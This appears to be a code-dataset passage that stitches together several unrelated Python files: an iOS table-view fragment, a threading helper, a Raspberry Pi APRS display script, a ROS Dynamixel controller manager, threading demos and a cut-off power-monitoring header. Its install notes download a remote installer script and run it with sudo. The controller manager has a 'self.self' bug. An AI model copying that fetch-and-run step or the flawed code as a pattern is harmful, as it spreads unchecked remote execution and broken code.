cell = objc.ObjCClass("UITableViewCell").alloc().initWithStyle(0, reuseIdentifier=cellIdentifer)
pass
cell.userInteractionEnabled = False
activityIndicator = objc.ObjCClass("UIActivityIndicatorView").alloc().initWithActivityIndicatorStyle(100)
activityIndicator.hidesWhenStopped = True
activityIndicator.center = objc.NSPoint(
self.tableView.frame.size.width / 2,
cell.frame.size.height / 2
)
cell.contentView.addSubview(activityIndicator)
activityIndicator.startAnimating()
return cell
cellIdentifer = "MQVSongCell"
cell = tableView.dequeueReusableCellWithIdentifier(cellIdentifer)
if cell is None:
cell = objc.ObjCClass("UITableViewCell").alloc().initWithStyle(3, reuseIdentifier=cellIdentifer)
pass
if len(self.songList) < indexPath.row:
return cell
song = self.songList[indexPath.row]
cell.textLabel.text = song.title
cell.detailTextLabel.text = song.artist
cell.imageView.image = song.art
if song.exists:
cell.userInteractionEnabled = True
cell.textLabel.enabled = True
cell.detailTextLabel.enabled = True
pass
else:
cell.userInteractionEnabled = False
cell.textLabel.enabled = False
cell.detailTextLabel.enabled = False
pass
return cell
pass
@objc.objc_method
def disposeDataSource(self):
self.changeDetector.stop()
pass
|
sched_basic.py
|
from __future__ import absolute_import
import logging
import threading
import signal
import subprocess
import socket
try:
from queue import Queue
except ImportError:
from Queue import Queue
__all__="subprocess socket Queue Lock Event spawn serve_forever".split()
Lock = threading.RLock
Event = threading.Event
class Threadlet(object):
def __init__(self, func, *args, **kwargs):
result = Queue()
def wrap():
try:
obj = (func(*args, **kwargs), None)
except Exception as e:
logging.warn("fail in thread", exc_info=True)
obj = (None, e)
result.put(obj)
self.thread = threading.Thread(target=wrap)
self.result = result
self.value = None
def start(self):
self.thread.start()
def join(self, timeout=None):
self.thread.join(timeout)
def get(self, block=True, timeout=None):
if self.thread.ident is None:
self.thread.start()
if self.result:
values = self.result.get(block=block, timeout=timeout)
self.result = None
if values[1] is None:
self.value = values[0]
else:
raise values[1]
return self.value
def spawn(func, *args, **kwargs):
th = Threadlet(func, *args, **kwargs)
th.start()
return th
def serve_forever(*servers, **opts):
ev = opts.get("main")
if not ev:
ev = Event()
signal.signal(signal.SIGINT, lambda num,fr: ev.set())
for serv in servers:
serv.start()
try:
while not ev.is_set():
ev.wait(timeout=0.5)
finally:
for serv in servers:
serv.stop()
if __name__=="__main__":
with Lock():
r = spawn(lambda x: x, 1)
assert r.get() == 1
e = Event()
def remote():
e.set()
r = spawn(remote)
assert e.wait(0.5)
assert r.get() == None
r.join()
|
direwatch.py
|
#!/usr/bin/python3
# direwatch
"""
Craig Lamparter KM6LYW, 2022, MIT Licnese
Code derived from Adafruit PIL python example
This will tail a direwolf log file and display callsigns on an
adafruit st7789 tft display (https://www.adafruit.com/product/4484).
Follow the instructions here to get the driver/library loaded:
https://learn.adafruit.com/adafruit-mini-pitft-135x240-color-tft-add-on-for-raspberry-pi/python-setup
Current configuration is for the 240x240 st7789 unit.
Do not install the kernel module/framebuffer.
GPIO pins 12 (PTT) and 16 (DCD) are monitored and light green/red icons respectively.
Configure these gpio pins in direwolf.
Installation on raspbian/bullseye for short-attentions span programmers like me:
sudo apt-get install python3-pip # python >= 3.6 required
sudo pip3 install adafruit-circuitpython-rgb-display
sudo pip3 install pyinotify
sudo apt-get install python3-dev python3-rpi.gpio
vi /boot/config.txt # uncomment following line: "dtparam=spi=on"
sudo pip3 install --upgrade adafruit-python-shell
wget https://raw.githubusercontent.com/adafruit/Raspberry-Pi-Installer-Scripts/master/raspi-blinka.py
sudo python3 raspi-blinka.py ## this gets the digitalio python module
sudo pip install aprslib ## so we can parse ax.25 packets
Much code taken from ladyada for her great work driving these devices,
# SPDX-FileCopyrightText: 2021 ladyada for Adafruit Industries
# SPDX-License-Identifier: MIT
"""
import argparse
import time
import subprocess
import digitalio
import board
from PIL import Image, ImageDraw, ImageFont
import re
import adafruit_rgb_display.st7789 as st7789
import pyinotify
import RPi.GPIO as GPIO
import threading
import signal
import os
import aprslib
# Configuration for CS and DC pins (these are PiTFT defaults):
cs_pin = digitalio.DigitalInOut(board.CE0)
dc_pin = digitalio.DigitalInOut(board.D25)
#reset_pin = digitalio.DigitalInOut(board.D24)
# Config for display baudrate (default max is 24mhz):
BAUDRATE = 64000000
# Setup SPI bus using hardware SPI:
spi = board.SPI()
# Use one and only one of these screen definitions:
## half height adafruit screen 1.1" (240x135), two buttons
#disp = st7789.ST7789(
# board.SPI(),
# cs=cs_pin,
# dc=dc_pin,
# baudrate=BAUDRATE,
# width=135,
# height=240,
# x_offset=53,
# y_offset=40,
# rotation=270,
#)
# full height adafruit screen 1.3" (240x240), two buttons
disp = st7789.ST7789(
spi,
cs=cs_pin,
dc=dc_pin,
baudrate=BAUDRATE,
height=240,
y_offset=80,
rotation=180
)
# don't write to display concurrently with thread
display_lock = threading.Lock()
# Create image and drawing object
if disp.rotation % 180 == 90:
height = disp.width # we swap height/width to rotate it to landscape!
width = disp.height
else:
width = disp.width # we swap height/width to rotate it to landscape!
height = disp.height
image = Image.new("RGBA", (width, height))
draw = ImageDraw.Draw(image)
# define some constants to help with graphics layout
padding = 4
title_bar_height = 34
def signal_handler(signal, frame):
print("Got ", signal, " exiting.")
draw.rectangle((0, 0, width, height), outline=0, fill=(30,30,30))
with display_lock:
disp.image(image)
#sys.exit(0) # thread ignores this
os._exit(0)
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
def parse_arguments():
ap = argparse.ArgumentParser()
ap.add_argument("-l", "--log", required=True, help="Direwolf log file location")
ap.add_argument("-f", "--fontsize", required=False, help="Font size for callsigns")
ap.add_argument("-t", "--title_text", required=False, help="Text displayed in title bar")
ap.add_argument("-o", "--one", action='store_true', required=False, help="Show one station at a time full screen")
args = vars(ap.parse_args())
return args
args = parse_arguments()
logfile = args["log"]
if args["fontsize"]:
# 30 puts 6 lines
# 33 puts 5 lines, max width
fontsize = int(args["fontsize"])
if fontsize > 33:
print("Look, this display isn't very wide, the maximum font size is 33pts, and you chose " + str(fontsize) + "?")
print("Setting to 33 instead.")
fontsize = 33
else:
fontsize = 30 # default 30
if args["title_text"]:
title_text = args["title_text"]
else:
title_text = "Direwatch"
# LED threads, bluetooth, RED, GREE"N
def bluetooth_connection_poll_thread():
bt_status = 0
GPIO.setmode(GPIO.BCM)
GPIO.setup(5, GPIO.OUT)
time.sleep(2) # so screen initialization doesn't overdraw bluetooth as off
while True:
cmd = "hcitool con | wc -l"
connection_count = subprocess.check_output(cmd, shell=True).decode("utf-8")
if int(connection_count) > 1:
if bt_status == 0:
bt_status = 1
bticon = Image.open('bt.small.on.png')
GPIO.output(5, GPIO.HIGH)
image.paste(bticon, (width - title_bar_height * 3 + 12 , padding + 2 ), bticon)
with display_lock:
disp.image(image)
else:
if bt_status == 1:
bt_status = 0
bticon = Image.open('bt.small.off.png')
GPIO.output(5, GPIO.LOW)
image.paste(bticon, (width - title_bar_height * 3 + 12 , padding + 2 ), bticon)
with display_lock:
disp.image(image)
time.sleep(2)
bluetooth_thread = threading.Thread(target=bluetooth_connection_poll_thread, name="btwatch")
bluetooth_thread.start()
def red_led_from_logfile_thread(): ## RED logfile
#print("red led changing via logfile")
#f = subprocess.Popen(['tail','-F',logfile], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
f = subprocess.Popen(['tail','-F',logfile], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
while True:
line = f.stdout.readline().decode("utf-8", errors="ignore")
search = re.search("^\[\d[A-Z]\]", line)
if search is not None:
draw.ellipse(( width - title_bar_height * 2 , padding, width - title_bar_height - padding * 2 , title_bar_height - padding), fill=(200,0,0,0))
with display_lock:
disp.image(image)
time.sleep(1)
draw.ellipse(( width - title_bar_height * 2 , padding, width - title_bar_height - padding * 2 , title_bar_height - padding), fill=(80,0,0,0))
with display_lock:
disp.image(image)
def handle_changeG(cb):
with open('/sys/class/gpio/gpio16/value', 'r') as f: ## GREEN
status = f.read(1)
if status == '0':
draw.ellipse(( width - title_bar_height , padding, width - padding * 2, title_bar_height - padding), fill=(0,80,0,0))
else:
draw.ellipse(( width - title_bar_height , padding, width - padding * 2, title_bar_height - padding), fill=(0,200,0,0))
with display_lock:
disp.image(image)
f.close
def handle_changeR(cb):
#print("red led changing via gpio")
with open('/sys/class/gpio/gpio12/value', 'r') as f: ## RED GPIO
status = f.read(1)
if status == '0':
draw.ellipse(( width - title_bar_height * 2 , padding, width - title_bar_height - padding * 2 , title_bar_height - padding), fill=(80,0,0,0))
else:
draw.ellipse(( width - title_bar_height * 2 , padding, width - title_bar_height - padding * 2 , title_bar_height - padding), fill=(200,0,0,0))
pass
with display_lock:
disp.image(image)
f.close
def null_function(junk): # default callback prints tons of debugging info
return()
# Instanciate a new WatchManager (will be used to store watches).
wmG = pyinotify.WatchManager()
wmR = pyinotify.WatchManager()
# Associate this WatchManager with a Notifier
notifierG = pyinotify.Notifier(wmG, default_proc_fun=null_function)
notifierR = pyinotify.Notifier(wmR, default_proc_fun=null_function)
# Watch both gpio pins for change if they exist
wmG.add_watch('/sys/class/gpio/gpio16/value', pyinotify.IN_MODIFY)
if os.path.exists("/sys/class/gpio/gpio12/value"):
wmR.add_watch('/sys/class/gpio/gpio12/value', pyinotify.IN_MODIFY)
watch_threadG = threading.Thread(target=notifierG.loop, name="led-watcherG", kwargs=dict(callback=handle_changeG))
# Use gpio pin for red led if it exists, otherwise watch log file for transmit activity
if os.path.exists("/sys/class/gpio/gpio12/value"):
watch_threadR = threading.Thread(target=notifierR.loop, name="led-watcherR", kwargs=dict(callback=handle_changeR))
else:
watch_threadR = threading.Thread(target=red_led_from_logfile_thread, name="redledthreadlog")
# Load a TTF font. Make sure the .ttf font file is in the
# same directory as the python script!
# Some other nice fonts to try: http://www.dafont.com/bitmap.php
fontname = "DejaVuSans.ttf"
fontname_bold = "DejaVuSans-Bold.ttf"
if os.path.exists("/usr/share/fonts/truetype/dejavu/" + fontname):
fontpath = "/usr/share/fonts/truetype/dejavu/" + fontname
elif os.path.exists("./" + fontname):
fontpath = "./" + fontname
else:
print("Couldn't find font " + fontname + " in working dir or /usr/share/fonts/truetype/dejavu/")
exit(1)
if os.path.exists("/usr/share/fonts/truetype/dejavu/" + fontname_bold):
fontpath_bold = "/usr/share/fonts/truetype/dejavu/" + fontname_bold
elif os.path.exists("./" + fontname_bold):
fontpath_bold = "./" + fontname_bold
else:
print("Couldn't find font " + fontname_bold + " in working dir or /usr/share/fonts/truetype/dejavu/")
exit(1)
font = ImageFont.truetype(fontpath, fontsize)
font_small = ImageFont.truetype(fontpath_bold, 18)
font_big = ImageFont.truetype(fontpath_bold, 24)
font_huge = ImageFont.truetype(fontpath_bold, 34)
font_epic = ImageFont.truetype(fontpath, 40)
#font = ImageFont.truetype("/usr/share/fonts/truetype/dafont/BebasNeue-Regular.ttf", fontsize)
#font_big = ImageFont.truetype("/usr/share/fonts/truetype/dafont/BebasNeue-Regular.ttf", 24)
#font_huge = ImageFont.truetype("/usr/share/fonts/truetype/dafont/BebasNeue-Regular.ttf", 34)
line_height = font.getsize("ABCJQ")[1] - 1 # tallest callsign, with dangling J/Q tails
# load and scale symbol chart based on font height
symbol_chart0x64 = Image.open("aprs-symbols-64-0.png")
symbol_chart1x64 = Image.open("aprs-symbols-64-1.png")
fontvertical = font.getsize("XXX")[1]
symbol_chart0x64.thumbnail(((fontvertical + fontvertical // 8) * 16, (fontvertical + fontvertical // 8) * 6)) # nudge larger than font, into space between lines
symbol_chart1x64.thumbnail(((fontvertical + fontvertical // 8) * 16, (fontvertical + fontvertical // 8) * 6)) # nudge larger than font, into space between lines
symbol_dimension = symbol_chart0x64.width//16
max_line_width = font.getsize("KN6MUC-15")[0] + symbol_dimension + (symbol_dimension // 8) # longest callsign i can think of in pixels, plus symbo width + space
max_cols = width // max_line_width
# Draw a black filled box to clear the image.
draw.rectangle((0, 0, width, height), outline=0, fill="#000000")
# Draw our logo
w,h = font.getsize(title_text)
draw.text( (padding * 3 , height // 2 - h) , title_text, font=font_huge, fill="#99AA99")
with display_lock:
disp.image(image)
time.sleep(1)
# erase the screen
draw.rectangle((0, 0, width, height), outline=0, fill="#000000")
# draw the header bar
draw.rectangle((0, 0, width, title_bar_height), fill=(30, 30, 30))
draw.text((padding, padding), title_text, font=font_big, fill="#99AA99")
# draw the bluetooth icon
bticon = Image.open('bt.small.off.png')
image.paste(bticon, (width - title_bar_height * 3 + 12 , padding + 2 ), bticon)
# draw Green LED
draw.ellipse(( width - title_bar_height , padding, width - padding * 2, title_bar_height - padding), fill=(0,80,0,0))
# draw Red LED
draw.ellipse(( width - title_bar_height * 2 , padding, width - title_bar_height - padding * 2 , title_bar_height - padding), fill=(80,0,0,0))
with display_lock:
disp.image(image)
# fire up green/red led threads
watch_threadG.start()
watch_threadR.start()
# setup screen geometries
call = "null"
x = padding
max_lines = ( height - title_bar_height - padding ) // line_height
max_cols = ( width // max_line_width )
line_count = 0
col_count = 0
# tail and block on the log file
f = subprocess.Popen(['tail','-F','-n','10',logfile], stdout=subprocess.PIPE,stderr=subprocess.PIPE)
# Display loops. list of stations, or a single station on the screen at a time
def single_loop():
symbol_chart0x64 = Image.open("aprs-symbols-64-0.png")
symbol_chart1x64 = Image.open("aprs-symbols-64-1.png")
# we try to get callsign, symbol and four relevant info lines from every packet
while True:
info1 = info2 = info3 = info4 = '' # sane defaults
line = f.stdout.readline().decode("utf-8", errors="ignore")
search = re.search("^\[\d\.\d\] (.*)", line) # see if logfile line is an incoming packet over RF
if search is not None:
packetstring = search.group(1)
packetstring = packetstring.replace('<0x0d>','\x0d').replace('<0x1c>','\x1c').replace('<0x1e>','\x1e').replace('<0x1f>','\0x1f').replace('<0x0a>','\0x0a')
else:
continue
try:
packet = aprslib.parse(packetstring) # parse packet
#print(packet)
call = packet['from']
supported_packet = True
except Exception as e: # aprslib doesn't support all packet types
#print("Exception: aprslib: ", str(e), ": ", packetstring)
supported_packet = False
packet = {}
search = re.search("^\[\d\.\d\] ([a-zA-Z0-9-]*)", line) # snag callsign from unsupported packet
if search is not None:
call = search.group(1)
symbol = '/' # unsupported packet symbol set to red ball
symbol_table = '/'
else:
continue
try:
if supported_packet:
if 'symbol' in packet: # get symbol from valid packet or use red ball
symbol = packet['symbol']
symbol_table = packet['symbol_table']
else:
symbol = '/'
symbol_table = '/'
# extract relevant info lines
if not supported_packet:
info1 = info2 = info3 = info4 = '' # no info in unsupported packet
elif 'weather' in packet: # weather (often contained in compressed/uncompressed type packets)
info1 = round(packet['weather']['temperature'])
info1 = str(int(info1) * 1.8 + 32) + 'F'
#print(info1)
info2 = str(packet['weather']['rain_since_midnight']) + '\" rain'
#print(info2)
info3 = str(round(packet['weather']['wind_speed'])) + ' m/h'
info3 = info3 + ' ' + str(packet['weather']['wind_direction']) + '\''
#print(info3)
info4 = str(packet['comment'])
#print(info4) # position packet
elif packet['format'] == 'mic-e' or packet['format'] == 'compressed' or packet['format'] == 'uncompressed' or packet['format'] == 'object':
info4 = packet['comment'] # fixme: comment is jibberish in all compressed packets
elif 'status' in packet: # status packet
info4 = packet['status']
except Exception as e:
print("Malformed/missing data: ", str(e), ": ", packetstring)
symbol_dimension = 64
offset = ord(symbol) - 33
row = offset // 16
col = offset % 16
y = height // 3
x = width // 3
draw.rectangle((0, title_bar_height, width, height), outline=0, fill="#000000") # erase most of screen
crop_area = (col*symbol_dimension, row*symbol_dimension, col*symbol_dimension+symbol_dimension, row*symbol_dimension+symbol_dimension)
if symbol_table == '/':
symbolimage = symbol_chart0x64.crop(crop_area)
else:
symbolimage = symbol_chart1x64.crop(crop_area)
symbolimage = symbolimage.resize((height // 2, height // 2), Image.NEAREST)
#image.paste(symbolimage, (0, 36), symbolimage)
image.paste(symbolimage, (0, title_bar_height), symbolimage)
draw.text((120, 50), str(info1), font=font_small, fill="#AAAAAA")
draw.text((120, 70), str(info2), font=font_small, fill="#AAAAAA")
draw.text((120, 90), str(info3), font=font_small, fill="#AAAAAA")
draw.text((5, 144), str(info4), font=font_small, fill="#AAAAAA")
draw.text((5, height - font_epic.getsize("X")[1] - 3), call, font=font_epic, fill="#AAAAAA") # text up from bottom edge
with display_lock:
disp.image(image)
time.sleep(1)
# Display loops. list of stations, or a single station on the screen at a time
def list_loop():
call = "null"
# position cursor in -1 slot, as the first thing the loop does is increment slot
y = padding + title_bar_height - font.getsize("ABCJQ")[1]
x = padding
max_lines = ( height - title_bar_height - padding ) // line_height
max_cols = ( width // max_line_width )
line_count = 0
col_count = 0
while True:
line = f.stdout.readline().decode("utf-8", errors="ignore")
# watch for regular packet
search = re.search("^\[\d\.\d\] (.*)", line)
if search is not None:
packetstring = search.group(1)
packetstring = packetstring.replace('<0x0d>','\x0d').replace('<0x1c>','\x1c').replace('<0x1e>','\x1e').replace('<0x1f>','\0x1f').replace('<0x0a>','\0x0a')
else:
continue
lastcall = call
try: # aprslib has trouble parsing all packets
packet = aprslib.parse(packetstring)
call = packet['from']
if 'symbol' in packet:
symbol = packet['symbol']
symbol_table = packet['symbol_table']
else:
symbol = '/'
symbol_table = '/'
except: # if it fails, let's just snag the callsign
#print("aprslib failed to parse.")
search = re.search("^\[\d\.\d\] ([a-zA-Z0-9-]*)", line)
if search is not None:
call = search.group(1)
symbol = '/'
symbol_table = '/'
else:
continue
offset = ord(symbol) - 33
row = offset // 16
col = offset % 16
if call == lastcall: # blink duplicates
time.sleep(0.5)
draw.text((x + symbol_dimension + (symbol_dimension // 8) , y), call, font=font, fill="#000000") # start text after symbol, relative padding
with display_lock:
disp.image(image)
time.sleep(0.1)
draw.text((x + symbol_dimension + (symbol_dimension // 8) , y), call, font=font, fill="#AAAAAA") # start text after symbol, relative padding
with display_lock:
disp.image(image)
else:
y += line_height
if line_count == max_lines: # about to write off bottom edge of screen
col_count += 1
x = col_count * max_line_width
y = padding + title_bar_height
line_count = 0
if col_count == max_cols: # about to write off right edge of screen
x = padding
y = padding + title_bar_height
draw.rectangle((0, title_bar_height + 1, width, height), outline=0, fill="#000000") # erase lines
line_count = 0
col_count = 0
time.sleep(2.0)
crop_area = (col*symbol_dimension, row*symbol_dimension, col*symbol_dimension+symbol_dimension, row*symbol_dimension+symbol_dimension)
if symbol_table == '/':
symbolimage = symbol_chart0x64.crop(crop_area)
else:
symbolimage = symbol_chart1x64.crop(crop_area)
image.paste(symbolimage, (x, y), symbolimage)
draw.text((x + symbol_dimension + (symbol_dimension // 8) , y), call, font=font, fill="#AAAAAA") # start text after symbol, relative padding
line_count += 1
with display_lock:
disp.image(image)
if args["one"]:
single_loop()
else:
list_loop()
exit(0)
|
controller_manager.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Software License Agreement (BSD License)
#
# Copyright (c) 2010, Antons Rebguns, Cody Jorgensen, Cara Slutter
# 2010-2011, Antons Rebguns
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of University of Arizona nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
__author__ = 'Antons Rebguns, Cody Jorgensen, Cara Slutter'
__copyright__ = 'Copyright (c) 2010-2011 Antons Rebguns, Cody Jorgensen, Cara Slutter'
__license__ = 'BSD'
__maintainer__ = 'Antons Rebguns'
__email__ = 'anton@email.arizona.edu'
from threading import Thread, Lock
import sys
import rospy
from dynamixel_driver.dynamixel_serial_proxy import SerialProxy
from diagnostic_msgs.msg import DiagnosticArray
from diagnostic_msgs.msg import DiagnosticStatus
from diagnostic_msgs.msg import KeyValue
from dynamixel_controllers.srv import StartController
from dynamixel_controllers.srv import StartControllerResponse
from dynamixel_controllers.srv import StopController
from dynamixel_controllers.srv import StopControllerResponse
from dynamixel_controllers.srv import RestartController
from dynamixel_controllers.srv import RestartControllerResponse
class ControllerManager:
def __init__(self):
rospy.init_node('dynamixel_controller_manager', anonymous=True)
rospy.on_shutdown(self.on_shutdown)
self.waiting_meta_controllers = []
self.controllers = {}
self.serial_proxies = {}
self.diagnostics_rate = rospy.get_param('~diagnostics_rate', 1)
self.start_controller_lock = Lock()
self.stop_controller_lock = Lock()
manager_namespace = rospy.get_param('~namespace')
serial_ports = rospy.get_param('~serial_ports')
for port_namespace,port_config in serial_ports.items():
port_name = port_config['port_name']
baud_rate = port_config['baud_rate']
readback_echo = port_config['readback_echo'] if 'readback_echo' in port_config else False
min_motor_id = port_config['min_motor_id'] if 'min_motor_id' in port_config else 0
max_motor_id = port_config['max_motor_id'] if 'max_motor_id' in port_config else 253
update_rate = port_config['update_rate'] if 'update_rate' in port_config else 5
error_level_temp = 75
warn_level_temp = 70
if 'diagnostics' in port_config:
if 'error_level_temp' in port_config['diagnostics']:
error_level_temp = port_config['diagnostics']['error_level_temp']
if 'warn_level_temp' in port_config['diagnostics']:
warn_level_temp = port_config['diagnostics']['warn_level_temp']
serial_proxy = SerialProxy(port_name,
port_namespace,
baud_rate,
min_motor_id,
max_motor_id,
update_rate,
self.diagnostics_rate,
error_level_temp,
warn_level_temp,
readback_echo)
serial_proxy.connect()
# will create a set of services for each serial port under common manager namesapce
# e.g. /dynamixel_manager/robot_arm_port/start_controller
# /dynamixel_manager/robot_head_port/start_controller
# where 'dynamixel_manager' is manager's namespace
# 'robot_arm_port' and 'robot_head_port' are human readable names for serial ports
rospy.Service('%s/%s/start_controller' % (manager_namespace, port_namespace), StartController, self.start_controller)
rospy.Service('%s/%s/stop_controller' % (manager_namespace, port_namespace), StopController, self.stop_controller)
rospy.Service('%s/%s/restart_controller' % (manager_namespace, port_namespace), RestartController, self.restart_controller)
self.serial_proxies[port_namespace] = serial_proxy
# services for 'meta' controllers, e.g. joint trajectory controller
# these controllers don't have their own serial port, instead they rely
# on regular controllers for serial connection. The advantage of meta
# controller is that it can pack commands for multiple motors on multiple
# serial ports.
# NOTE: all serial ports that meta controller needs should be managed by
# the same controler manager.
rospy.Service('%s/meta/start_controller' % manager_namespace, StartController, self.start_controller)
rospy.Service('%s/meta/stop_controller' % manager_namespace, StopController, self.stop_controller)
rospy.Service('%s/meta/restart_controller' % manager_namespace, RestartController, self.restart_controller)
self.diagnostics_pub = rospy.Publisher('/diagnostics', DiagnosticArray)
if self.diagnostics_rate > 0: Thread(target=self.diagnostics_processor).start()
def on_shutdown(self):
for serial_proxy in self.serial_proxies.values():
serial_proxy.disconnect()
def diagnostics_processor(self):
diag_msg = DiagnosticArray()
rate = rospy.Rate(self.diagnostics_rate)
while not rospy.is_shutdown():
diag_msg.status = []
diag_msg.header.stamp = rospy.Time.now()
for controller in self.controllers.values():
try:
joint_state = controller.joint_state
temps = joint_state.motor_temps
max_temp = max(temps)
status = DiagnosticStatus()
status.name = 'Joint Controller (%s)' % controller.joint_name
status.hardware_id = 'Robotis Dynamixel %s on port %s' % (str(joint_state.motor_ids), controller.port_namespace)
status.values.append(KeyValue('Goal', str(joint_state.goal_pos)))
status.values.append(KeyValue('Position', str(joint_state.current_pos)))
status.values.append(KeyValue('Error', str(joint_state.error)))
status.values.append(KeyValue('Velocity', str(joint_state.velocity)))
status.values.append(KeyValue('Load', str(joint_state.load)))
status.values.append(KeyValue('Moving', str(joint_state.is_moving)))
status.values.append(KeyValue('Temperature', str(max_temp)))
status.level = DiagnosticStatus.OK
status.message = 'OK'
diag_msg.status.append(status)
except:
pass
self.diagnostics_pub.publish(diag_msg)
rate.sleep()
def check_deps(self):
controllers_still_waiting = []
for i,(controller_name,deps,kls) in enumerate(self.waiting_meta_controllers):
if not set(deps).issubset(self.controllers.keys()):
controllers_still_waiting.append(self.waiting_meta_controllers[i])
rospy.logwarn('[%s] not all dependencies started, still waiting for %s...' % (controller_name, str(list(set(deps).difference(self.controllers.keys())))))
else:
dependencies = [self.controllers[dep_name] for dep_name in deps]
controller = kls(controller_name, dependencies)
if controller.initialize():
controller.start()
self.controllers[controller_name] = controller
self.waiting_meta_controllers = controllers_still_waiting[:]
def start_controller(self, req):
port_name = req.port_name
package_path = req.package_path
module_name = req.module_name
class_name = req.class_name
controller_name = req.controller_name
self.start_controller_lock.acquire()
if controller_name in self.controllers:
self.start_controller_lock.release()
return StartControllerResponse(False, 'Controller [%s] already started. If you want to restart it, call restart.' % controller_name)
try:
if module_name not in sys.modules:
# import if module not previously imported
package_module = __import__(package_path, globals(), locals(), [module_name], -1)
else:
# reload module if previously imported
package_module = reload(sys.modules[package_path])
controller_module = getattr(package_module, module_name)
except ImportError, ie:
self.start_controller_lock.release()
return StartControllerResponse(False, 'Cannot find controller module. Unable to start controller %s\n%s' % (module_name, str(ie)))
except SyntaxError, se:
self.start_controller_lock.release()
return StartControllerResponse(False, 'Syntax error in controller module. Unable to start controller %s\n%s' % (module_name, str(se)))
except Exception, e:
self.start_controller_lock.release()
return StartControllerResponse(False, 'Unknown error has occured. Unable to start controller %s\n%s' % (module_name, str(e)))
kls = getattr(controller_module, class_name)
if port_name == 'meta':
self.waiting_meta_controllers.append((controller_name,req.dependencies,kls))
self.check_deps()
self.start_controller_lock.release()
return StartControllerResponse(True, '')
if port_name != 'meta' and (port_name not in self.serial_proxies):
self.start_controller_lock.release()
return StartControllerResponse(False, 'Specified port [%s] not found, available ports are %s. Unable to start controller %s' % (port_name, str(self.serial_proxies.keys()), controller_name))
controller = kls(self.serial_proxies[port_name].dxl_io, controller_name, port_name)
if controller.initialize():
controller.start()
self.controllers[controller_name] = controller
self.check_deps()
self.start_controller_lock.release()
return StartControllerResponse(True, 'Controller %s successfully started.' % controller_name)
else:
self.start_controller_lock.release()
return StartControllerResponse(False, 'Initialization failed. Unable to start controller %s' % controller_name)
def stop_controller(self, req):
controller_name = req.controller_name
self.stop_controller_lock.acquire()
if controller_name in self.controllers:
self.controllers[controller_name].stop()
del self.controllers[controller_name]
self.stop_controller_lock.release()
return StopControllerResponse(True, 'controller %s successfully stopped.' % controller_name)
else:
self.self.stop_controller_lock.release()
return StopControllerResponse(False, 'controller %s was not running.' % controller_name)
def restart_controller(self, req):
response1 = self.stop_controller(StopController(req.controller_name))
response2 = self.start_controller(req)
return RestartControllerResponse(response1.success and response2.success, '%s\n%s' % (response1.reason, response2.reason))
if __name__ == '__main__':
try:
manager = ControllerManager()
rospy.spin()
except rospy.ROSInterruptException: pass
|
10.enumerate_all_threads.py
|
import random
import threading
import time
import logging
import sys
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s',
)
def worker():
"""thread worker function"""
print("Locals values to thread:", threading.local())
lcl = threading.local()
lcl.Name = "sudeep"
print(lcl.Name)
t = threading.currentThread()
print(threading.currentThread().getName())
pause = random.randint(1, 5)
print(pause)
logging.debug('sleeping %s', pause)
time.sleep(pause)
for i in range(1, 3):
t = threading.Thread(target=worker)
print(threading.currentThread().getName())
t.setDaemon = True
t.start()
main_thread = threading.currentThread()
for threadId, stack in sys._current_frames().items():
print("thread id: ", threadId, stack)
print(main_thread.getName())
print("total active theads: ", threading.active_count())
for t in threading.enumerate():
if t is main_thread:
continue
logging.debug('continue joining %s', t.getName())
t.join()
|
mp_workers.py
|
import time
import random
from multiprocessing import Process, Queue, current_process, freeze_support
#
# Function run by worker processes
#
def worker(input, output):
for func, args in iter(input.get, 'STOP'):
result = calculate(func, args)
output.put(result)
#
# Function used to calculate result
#
def calculate(func, args):
result = func(*args)
return '%s says that %s%s = %s' % \
(current_process().name, func.__name__, args, result)
#
# Functions referenced by tasks
#
def mul(a, b):
time.sleep(0.5*random.random())
return a * b
def plus(a, b):
time.sleep(0.5*random.random())
return a + b
#
#
#
def test():
NUMBER_OF_PROCESSES = 4
TASKS1 = [(mul, (i, 7)) for i in range(20)]
TASKS2 = [(plus, (i, 8)) for i in range(10)]
# Create queues
task_queue = Queue()
done_queue = Queue()
# Submit tasks
for task in TASKS1:
task_queue.put(task)
# Start worker processes
for i in range(NUMBER_OF_PROCESSES):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
print 'Unordered results:'
for i in range(len(TASKS1)):
print '\t', done_queue.get()
# Add more tasks using `put()`
for task in TASKS2:
task_queue.put(task)
# Get and print some more results
for i in range(len(TASKS2)):
print '\t', done_queue.get()
# Tell child processes to stop
for i in range(NUMBER_OF_PROCESSES):
task_queue.put('STOP')
if __name__ == '__main__':
freeze_support()
test()
|
power_monitoring.py
|
import random
import threading
import time
from statistics import mean
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
